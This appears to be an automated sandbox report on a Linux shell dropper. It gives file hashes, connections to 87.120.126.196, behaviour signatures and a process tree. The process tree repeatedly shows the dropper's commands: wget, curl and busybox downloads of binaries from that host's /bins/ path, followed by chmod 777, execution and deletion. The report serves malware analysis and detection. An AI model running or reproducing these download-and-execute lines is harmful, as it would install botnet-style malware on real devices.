BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:30

Reported

2024-10-25 01:33

Platform

debian9-mipsel-20240729-en

Max time kernel

63s

Max time network

65s

Command Line

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A

Processes

/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

